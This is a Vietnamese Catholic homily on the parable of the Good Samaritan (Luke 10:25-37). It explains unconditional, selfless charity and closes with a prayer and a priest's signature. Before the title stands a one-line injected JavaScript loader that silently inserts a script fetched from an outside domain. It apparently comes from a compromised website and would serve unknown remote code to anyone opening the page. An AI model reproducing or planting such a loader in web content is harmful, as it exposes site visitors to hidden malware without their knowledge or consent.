;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); TÔI PHẢI LÀM GÌ ĐỂ ĐƯỢC SỰ SỐNG ĐỜI ĐỜI – Xitô PS

TÔI PHẢI LÀM GÌ ĐỂ ĐƯỢC SỰ SỐNG ĐỜI ĐỜI

SUY NIỆM THỨ 2 TUẦN XXVII

LC 10, 25-37

Mặc dầu nhóm Luật sĩ và Pharisiêu không ưa gì Đức Giêsu, họ đã từng đối đầu với Ngài bằng nhiều thủ đoạn dưới nhiều bình diện: tôn giáo, chính trị xã hội, truyền thống, lề luât…Tất cả những vấn nạn họ đặt ra với Đức Giêsu cố ý gài bẫy Ngài, nhưng Ngài đã hóa giải một cách hoàn hảo đầy nhân bản và nhân ái bao dung! Trong chiều hướng đó, qua đoạn Tin Mừng hôm nay, thánh sử Luca tường thuật cho chúng bối cảnh cuộc gặp gỡ của Đức Giêsu và một luật sĩ với nội dung như sau: “Và này có người thông luật kia đứng lên hỏi Đức Giêsu để thử Người rằng: Thưa Thầy, tôi phải làm gì để được sự sống đời đời làm gia nghiệp? Đức Giêsu không trực tiếp trả lời, Ngài tỏ ra rất tế nhị vừa tôn trọng cương vị của ông là một luật sĩ vừa để ông ta biết mình phải làm gì để được sự sống đời đời làm gia nghiệp, nên Ngài đã hỏi ông: “Trong luật đã viết gì: Ông ta thưa: Ngươi phải yêu mến Đức Chúa, Thiên Chúa của người hết lòng, hết linh hồn, hết sức lực và hết trí khôn ngươi, và yêu mến người thân cận như chính mình”. Đức Giêsu phê cho ông mười điểm và nói: “Ông trả lời đúng lắm, cứ làm như vậy là sẽ được sống”.

Nhưng ông ấy muốn chứng tỏ là mình có lý, nên ông mới thưa cùng Đức Giêsu rằng: “Nhưng ai là người thân cận của tôi?” Xưa theo quan niệm của người Do Thái: Người thân cận là bà con thân thuộc, cùng huyết thống, giống nòi, chủng tộc, tôn giáo, bè phái, phe nhóm của mình mà thôi. Nhưng nhân dịp người Luật sĩ đặt câu hỏi “ ai là người thân cận của tôi’, thì Đức Giêsu dùng dụ ngôn Người Samaria tốt lành, vừa thực tế, vừa ấn tượng hiện sinh, để giới thiệu không những cho ông Luật sĩ mà cho mỗi người chúng ta nữa là phải có một tầm nhìn rộng lớn như cái nhìn của Chúa không những trong tương quan với tha nhân, mà cả trong mối tương quan với Thiên Chúa nữa, nhất là trong vấn đề thực hành đức mến Chúa yêu người…Dụ ngôn giới thiệu, ngoài con người bị nạn, ba nhân vật  là thầy Tư tế, thầy Lêvi, và người Samaria, tất cả đều từ Giêrusalem xuống Giêrikhô.

Xuyên qua trình thuật, chúng ta nhận thấy thái độ và cách ứng xử của thầy Tư tế và thầy Lêvi, đại diện cho hàng giáo sĩ đạo Do thái quá vụ hình thức lề luật mà quên đi luật căn bản Đức Mến “Kính Chúa Yêu Người” trong khi đó người Samaria, một người ngoại đạo đối với người Do thái đã tỏ lòng chạnh thương thực hành đức bác ái một cách chân tình qua thái độ và ứng xử của ông ta đối với người bị nạn. Tất nhiên, thái độ và cách hành xử của người Samaria hẳn tác động mạnh mẽ và gây ấn tượng sâu đậm với người thông luật, chứng tỏ khi Chúa hỏi ông ta: “Vậy theo ông nghĩ, trong ba người đó, ai đã tỏ ra là người thân cận với người đã bị rơi vào tay kẻ cướp. Người thông luật đã trả lời: Chính là kẻ đã thực thi lòng thương xót đối với người ấy. Đức Giêsu bảo ông ta: ông hãy đi và cũng hãy làm như vậy”.

Vậy dụ ngôn người Samaria tốt lành trình bày về mẫu gương bác ái Kitô giáo:

  • Bác ái vô điều kiện: không phân biệt đối tượng, vì người Samaria không phân biệt người bị nạn là ai.
  • Bác ái vị tha: vì chỉ mong cho người bị nạn được cứu sống.
  • Bác ái vô vị lợi: vì người Samaria sẵn sàng tốn phí mà không đòi hỏi một sự đền bù nào khác.

Điều này chứng tỏ tình bác ái yêu thương phải vượt lên trên mọi lề luật, vì luật được đặt ra là vì lợi ích cho con người. Trong thực tế, chúng ta đừng quá câu nệ lý do này hay lý do khác để miễn chước cho mình thực thi bác ái yêu thương.

Lạy Chúa, xin giúp chúng con tích cực thực thi giới răn căn bản và cao cả nhất là Mến Chúa Yêu Người như Chúa đã dạy, để mai ngày đạt tới hạnh phúc và cuộc sống đời đời làm gia nghiệp. Amen.

 

LM PHÊRÔ KHOA- LÊ TRỌNG NGỌC

 

 

 

 

 

 

 

 

 

 

 

 

You May Also Like

Trả lời

X